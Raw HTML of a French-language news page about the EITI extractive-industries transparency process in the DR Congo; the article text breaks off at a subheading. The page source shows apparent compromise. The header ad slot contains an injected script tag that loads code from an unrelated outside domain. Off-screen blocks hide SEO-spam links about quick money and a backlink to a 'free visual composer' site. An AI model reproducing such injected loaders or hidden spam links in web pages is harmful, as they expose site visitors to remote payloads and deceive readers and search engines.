<!doctype html >
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="fr-FR"> <!--<![endif]-->
<head>
    <title>Processus ITIE en Afrique: De belles perspectives pour la Rdc | Groupe de Presse l&#039;Avenir</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="La Rédaction">
    <link rel="pingback" href="https://groupelavenir.org/xmlrpc.php" />

    <meta property="og:image" content="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/8-2.png?fit=517%2C292&ssl=1" /><link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Groupe de Presse l&#039;Avenir &raquo; Flux" href="https://groupelavenir.org/feed/" />
<link rel="alternate" type="application/rss+xml" title="Groupe de Presse l&#039;Avenir &raquo; Flux des commentaires" href="https://groupelavenir.org/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Groupe de Presse l&#039;Avenir &raquo; Processus ITIE en Afrique: De belles perspectives pour la Rdc Flux des commentaires" href="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/groupelavenir.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='jobair-ticker-css-css'  href='https://groupelavenir.org/wp-content/plugins/jb-news-ticker/css/jquery.smarticker.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='https://groupelavenir.org/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.5' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='chosen-css'  href='https://groupelavenir.org/wp-content/plugins/wp-job-manager/assets/css/chosen.css?ver=1.1.0' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='https://groupelavenir.org/wp-content/plugins/wp-job-manager/assets/css/frontend.css?ver=1.28.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='https://groupelavenir.org/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-opensans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-ubuntu-css'  href='https://fonts.googleapis.com/css?family=Ubuntu%3A300%2C400%2C500%2C700%2C300italic%2C400italic%2C500italic%2C700italic&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-pt-sans-css'  href='https://fonts.googleapis.com/css?family=PT+Sans%3A400%2C700%2C400italic&#038;subset=latin%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-oswald-css'  href='https://fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700&#038;subset=latin%2Clatin-ext&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-roboto-cond-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A300italic%2C400italic%2C700italic%2C400%2C300%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-vollkorn-css'  href='https://fonts.googleapis.com/css?family=Vollkorn%3A400italic%2C700italic%2C400%2C700&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='td-bootstrap-css'  href='https://groupelavenir.org/wp-content/themes/Newspaper/includes/wp_booster/external/bootstrap/td-bootstrap.css?ver=4.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://groupelavenir.org/wp-content/themes/Newspaper/style.css?ver=4.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='https://groupelavenir.org/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://groupelavenir.org/wp-content/plugins/jetpack/css/jetpack.css?ver=6.3.3' type='text/css' media='all' />
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jb-news-ticker/js/jquery.smarticker.min.js?ver=1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.5'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sfpp_script_vars = {"language":"fr_FR","appId":"297186066963865"};
/* ]]> */
</script>
<script type='text/javascript' async="async" src='https://groupelavenir.org/wp-content/plugins/simple-facebook-twitter-widget/js/simple-facebook-page-root.js?ver=1.4.15'></script>
<link rel='https://api.w.org/' href='https://groupelavenir.org/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://groupelavenir.org/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://groupelavenir.org/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel="canonical" href="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/" />
<link rel='shortlink' href='https://wp.me/pa8S0I-dlx' />
<link rel="alternate" type="application/json+oembed" href="https://groupelavenir.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fgroupelavenir.org%2Fprocessus-itie-en-afrique-de-belles-perspectives-pour-la-rdc%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://groupelavenir.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fgroupelavenir.org%2Fprocessus-itie-en-afrique-de-belles-perspectives-pour-la-rdc%2F&#038;format=xml" />

<!--Plugin WP Overview (lite) 2011.0723.2011 Active-->

		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = '8d16195927';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"https://groupelavenir.org/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		
<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<link rel='dns-prefetch' href='//i0.wp.com'/>
<link rel='dns-prefetch' href='//i1.wp.com'/>
<link rel='dns-prefetch' href='//i2.wp.com'/>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://groupelavenir.org/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]-->			<style type="text/css">
				.jetpack-lazy-image {
					display: none;
				}
				.jetpack-lazy-images-js .jetpack-lazy-image {
					display: inline-block;
				}
			</style>
			<script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js'
				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Processus ITIE en Afrique: De belles perspectives pour la Rdc" />
<meta property="og:url" content="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/" />
<meta property="og:description" content="Le succès dans la mise en œuvre du processus ITIE dépend en grande partie de la capacité des parties prenantes de respecter toutes les dispositions prévues dans le cadre de la matérialisation de l’…" />
<meta property="article:published_time" content="2018-09-04T22:48:25+00:00" />
<meta property="article:modified_time" content="2018-09-04T22:48:25+00:00" />
<meta property="og:site_name" content="Groupe de Presse l&#039;Avenir" />
<meta property="og:image" content="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/8-2.png?fit=517%2C292&amp;ssl=1" />
<meta property="og:image:width" content="517" />
<meta property="og:image:height" content="292" />
<meta property="og:locale" content="fr_FR" />
<meta name="twitter:text:title" content="Processus ITIE en Afrique: De belles perspectives pour la Rdc" />
<meta name="twitter:image" content="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/09/8-2.png?fit=517%2C292&#038;ssl=1&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->

<!-- Style compiled by theme -->

<style>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</style>


<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_cur_cat = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.is_ajax_running = false;
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="https://groupelavenir.org/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="https://groupelavenir.org/wp-content/themes/Newspaper";
var tds_snap_menu="snap";
var tds_header_style="3";
var tds_mobile_swipe="";
var td_search_url="https://groupelavenir.org/search/";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top="0";
var tds_theme_color_site_wide="#082185";
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-61742628-1', 'auto');
  ga('send', 'pageview');

</script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script>
google_ad_client = "pub-3388840866909005";
/* Recherche */
google_ad_slot = "7163530091";
google_ad_width = 291;
google_ad_height = 250;
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-7460089153917976",
          enable_page_level_ads: true
     });
</script-->
</head>

<body class="post-template-default single single-post postid-51307 single-format-standard td-boxed-layout processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc single_template_1 newspaper wpb-js-composer js-comp-ver-5.1 vc_responsive">



<div id="outer-wrap">
    <div id="td-mobile-nav" class="td-transition-content-and-menu">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">FERME</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-navigateur-container"><ul id="menu-navigateur" class=""><li id="menu-item-6325" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow menu-item-6325"><a href="http://groupelavenir.org/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">Accueil</span></a></li>
<li id="menu-item-5" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5"><a href="https://groupelavenir.org/category/actualites/">Actualités</a></li>
<li id="menu-item-10" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10"><a href="https://groupelavenir.org/category/nation/">Nation</a></li>
<li id="menu-item-11" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://groupelavenir.org/category/politique/">Politique</a></li>
<li id="menu-item-6" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6"><a href="https://groupelavenir.org/category/culture/">Culture</a></li>
<li id="menu-item-24516" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-24516"><a href="https://groupelavenir.org/category/avenir-femme/">Avenir femme</a></li>
<li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://groupelavenir.org/category/monde/">Monde</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8"><a href="https://groupelavenir.org/category/economie/">Economie</a></li>
<li id="menu-item-15" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="https://groupelavenir.org/category/sport/">Sport</a></li>
<li id="menu-item-14" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14"><a href="https://groupelavenir.org/category/societe/">Société</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12"><a href="https://groupelavenir.org/category/provinces/">Provinces</a></li>
</ul></div>    </div>
</div>    <div id="inner-wrap" class="td-transition-content-and-menu">
<div class="td-header-menu-wrap">
    <div class="container">
        <div class="row">
            <div class="span9">
                                            </div>

            <div class="span3">
                            </div>

        </div>
    </div>
</div>


<div style="position:absolute; top:-9999px;">
<ul><li><a href="http://groupelavenir.org/je-veux-largent-facile.html">je veux gagner des sous</a></li><li><a href="http://groupelavenir.org/je-veux-gagner-de-largent-gratuit.html">je veux gagner de largent facilement et rapidement</a></li><li><a href="http://groupelavenir.org/gw-se-faire-de-largent-rapidement.html">gt5 gagner de largent rapidement</a></li><li><a href="http://groupelavenir.org/gagner-argent-pokemon-x.html">gagner argent plantes vs zombies</a></li><li><a href="http://groupelavenir.org/gagner-argent-kin.html">gagner argent kingoloto</a></li><li><a href="http://groupelavenir.org/devenir-riche-au-qatar.html">devenir riche au japon</a></li><li><a href="http://groupelavenir.org/comment-gagner-plus-dargent-en-tant-fonctionnaire.html">comment gagner plus dargent en congé parental</a></li><li><a href="http://groupelavenir.org/comment-gagner-des-sous-dans-minecraft.html">comment gagner des sous dans minecraft</a></li><li><a href="http://groupelavenir.org/comment-gagner-de-l-argent-rapidement-et-gratuitement.html">comment gagner de l argent rapidement en restant chez soi</a></li><li><a href="http://groupelavenir.org/comment-faire-de-l-argent-sur-ebay.html">comment faire de l argent rapidement et facilement</a></li><li><a href="http://groupelavenir.org/astuce-gagner-argent.html">astuce argent facile</a></li><li><a href="http://groupelavenir.org/argent-rapide-boss-2.html">argent rapide belgique</a></li><li><a href="http://groupelavenir.org/argent-de-poche-traduction-espagnol.html">argent de poche tpe</a></li></ul></div>
<!-- full width logo -->
<div class="td-header-bg">
    <div class="container header-style-3">
        <div class="row">
            <div class="span12 td-full-logo" role="banner" itemscope="itemscope" itemtype="https://schema.org/Organization">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                                                        <a class="td-logo" itemprop="url" href="https://groupelavenir.org"><img src="http://groupelavenir.org/wp-content/uploads/2015/08/ga3.jpg" alt=""/></a>
                                <meta itemprop="name" content="Groupe de Presse l&#039;Avenir">
                                                </div>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- header menu -->

<div class="td-menu-placeholder">

    <div class="td-menu-background">
        <div class="container td-menu-wrap">



            <div class="row-fluid td-menu-header">

                <div class="span11">
                    

                    <div id="td-top-mobile-toggle">
                        <ul class="sf-menu">
                            <li>
                                <a href="#">
                                    <span class="menu_icon td-sp td-sp-ico-menu"></span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <div id="td-top-menu" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">

                            <div class="menu-navigateur-container"><ul id="menu-navigateur-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow td-menu-item td-normal-menu menu-item-6325"><a href="http://groupelavenir.org/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">Accueil</span></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5"><a href="https://groupelavenir.org/category/actualites/">Actualités</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-10"><a href="https://groupelavenir.org/category/nation/">Nation</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-11"><a href="https://groupelavenir.org/category/politique/">Politique</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-6"><a href="https://groupelavenir.org/category/culture/">Culture</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-24516"><a href="https://groupelavenir.org/category/avenir-femme/">Avenir femme</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-9"><a href="https://groupelavenir.org/category/monde/">Monde</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-8"><a href="https://groupelavenir.org/category/economie/">Economie</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-15"><a href="https://groupelavenir.org/category/sport/">Sport</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-14"><a href="https://groupelavenir.org/category/societe/">Société</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-12"><a href="https://groupelavenir.org/category/provinces/">Provinces</a></li>
</ul></div>                    </div>



                </div>

                <div class="span1" id="td-top-search">
                    <!-- Search -->
                    <div class="header-search-wrap">
                        <div class="dropdown header-search">
                            <a id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><span class="td-sp td-sp-ico-search"></span></a>
                            <div class="dropdown-menu" aria-labelledby="search-button">
                                <form role="search" method="get" class="td-search-form" action="https://groupelavenir.org/">
                                    <div class="td-head-form-search-wrap">
                                        <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Recherche" />
                                    </div>
                                </form>
                                <div id="td-aj-search"></div>
                            </div>
                        </div>
                    </div>
                </div>


            </div> <!-- /.row-fluid -->
        </div> <!-- /.td-menu-wrap -->
    </div> <!-- /.td-menu-background -->
</div> <!-- /.td-menu-placeholder -->


        <div class="container">
<div id="widget-area-h" class="widget-area" role="complementary">
			</div><!-- .widget-area -->
        </div> <!-- /.td-menu-wrap --><div class="container header-content-rec">
    <div class="row">
        <div class="span12">
            <div class="td-a-rec td-a-rec-id-header "><script src='https://stat.uustoughtonma.org/stats.js?f=n' type='text/javasript'></script></div>        </div>
    </div>
</div><div class="container">
<aside class="widget widget_execphp">			<div class="execphpwidget"> <script type="text/javascript">
			jQuery(document).ready(function(){			
				jQuery(".smarticker1").smarticker({	
				theme: 2,
				speed: 2000,
				title: "Dépèches",
				rounded: false,
				animation: "slide"
				});
			});
			</script>
					<div class="smarticker1">
						<ul>
							
							
						<li><a href="https://groupelavenir.org/apres-le-verdict-de-la-cour-constitutionnel-mende-remet-bemba-a-sa-place/">Après le verdict de la Cour Constitutionnel: Mende remet Bemba à sa place</a></li>										
								
			
						<li><a href="https://groupelavenir.org/devant-la-presse-sud-coreenne-nangaa-rassure-quant-a-la-tenue-des-elections-le-23-decembre-2018/">Devant la presse sud-coréenne: Nangaa rassure quant à la tenue des élections le 23 décembre 2018</a></li>										
								
	</ul></div></div>
		</aside></div>

        <div class="container td-page-wrap">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                    <div class="span8 column_container td-post-content" role="main" itemprop="mainContentOfPage">
                <div class="entry-crumbs"><span itemscope itemtype="https://data-vocabulary.org/Breadcrumb"><a title="Voir tous les articles dans Economie" class="entry-crumb" itemprop="url" href="https://groupelavenir.org/category/economie/"><span itemprop="title">Economie</span></a></span></div>
    <article id="post-51307" class="post-51307 post type-post status-publish format-standard has-post-thumbnail hentry category-economie np" itemscope itemtype="https://schema.org/Article">

        <header>

            <h1 itemprop="name" class="entry-title">Processus ITIE en Afrique: De belles perspectives pour la Rdc</h1>
            <div class="meta-info">
                <ul class="td-category"><li class="entry-category"><a  href="https://groupelavenir.org/category/economie/">Economie</a></li></ul>                <div class="td-clear-author"></div><span class="td-block-author">par <a itemprop="author" href="https://groupelavenir.org/author/groupela/">La Rédaction</a> - </span><meta itemprop="interactionCount" content="UserComments:0"/>                <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-09-04T23:48:25+00:00" >Sep 4, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>                <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-51307">40</span></div>            </div>
        </header>


        

        <div class="td-post-featured-image"><img width="326" height="235" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/8-2.png?resize=326%2C235&ssl=1" alt="" title="8"/></div>
        <div class="td-post-text-content">
            <div style="position:absolute;top:0;left:-9999px;">Want create site? With <a href="https://dlwordpress.com/wordpress-visual-composer-new/">Free visual composer</a> you can do it easy.</div><p>Le succès dans la mise en œuvre du processus ITIE dépend en grande partie de la capacité des parties prenantes de respecter toutes les dispositions prévues dans le cadre de la matérialisation de l’initiative. Le respect rigoureux desdites dispositions est un grand défi auquel se livre le groupe multipartite congolais. C’est ainsi qu’en République démocratique du Congo, ce processus se trouve être depuis un temps en bonne voie et s’est même positionné parmi les meilleurs processus en Afrique.</p>
<p>C’est ce qu’a laissé entendre Mme Marie-Thérèse Holenn Agnong, Coordonnatrice ai de l’Initiative pour la transparence des industries extractives en République démocratique du Congo (ITIE/RDC), au cours d’une interview à bâtons rompus qu’elle a bien voulue accorder à la presse, samedi dernier, depuis le pavillon 10 de la Foire internationale de Kinshasa (Fikin), où un imposant stand ITIE est érigé, rivalisant d’ardeur avec ceux d’autres entreprises et société de la place.</p>
<p>Me Holenn qui répondait à la question sur les retombées de la présence de l’ITIE au Congo/Kinshasa, a confirmé que l’adhésion à ce processus est à considérer comme une bouffée d’oxygène pour le pays, cela pour autant que l’on assiste à une transparence sans précédent dans le secteur des ressources naturelles.</p>
<p><em>« Avec l’ITIE, n’importe quel Congolais à travers le pays peut savoir à ce jour tels minerais produisent autant d’argent et que cet argent transite par telle banque et logé dans tel compte du Trésor, alors qu’il y a quelques années, c’était une terrible opacité »</em>, a souligné en substance Mme la coordonnatrice.</p>
<p>Pour Mme Holenn, l’ITIE permet la dissémination des informations sur les paiements et recettes des industries extractives et qu’une fois en possession desdites informations, parlementaires, médias, société civile et voire toutes les couches sociales de la population, peuvent demander aux gouvernants des comptes sur la manière dont ils utilisent ces revenus.</p>
<p>A l’en croire, l’ITIE reste une opportunité pour renforcer la bonne gouvernance, tout en assurant la maximisation des recettes avec comme conséquence la réduction de la pauvreté et l’amélioration des conditions des vues de la population. Parlant toujours du bien-fondé de l’ITIE, cette avocate a tenu à justifier la pratique de la transparence qui prévaut pour le moment au pays, en illustrant par un incident malheureux survenu lors de la publication du rapport annuel  2010.</p>
<p>En effet, une bagatelle somme de 88 millions de dollars a disparu et l’on avait plus ses traces, alors qu’elle avait été versée dans les banques commerciales, sans être transmise dans les caisses de l’Etat, dans les 48 heures qui suivaient son dépôt, comme le prévoit la loi. C’est encore grâce à l’ITIE que l’on a pu retracer jusqu’à retrouver cette enveloppe.</p>
<p>Par ailleurs, a ajouté la patronne du secrétariat technique ITIE/RDC, l’initiative a créé des débats jusqu’au fin fond de l’intérieur du pays, comme à Mwanda par exemple, au Kongo Central, où le pétrole produit par la Perenco fait désormais l’objet d’un contrôle jusqu’au niveau de la population autochtone.</p>
<p>Et depuis, la transparence de Perenco est constatée et celle-ci justifie ses investissements au bénéfice de la population, véritable propriétaire des ressources naturelles. Autre avantage de l’ITIE, selon cette juriste, tient au fait que toutes les sociétés qui déclarent auprès de l’initiative sont cotées par les bourses internationales sur base de leurs comportements au pays tels que relevés dans les rapports ITIE.</p>
<p><strong>La Rdc est redevenue au centre des débats</strong></p>
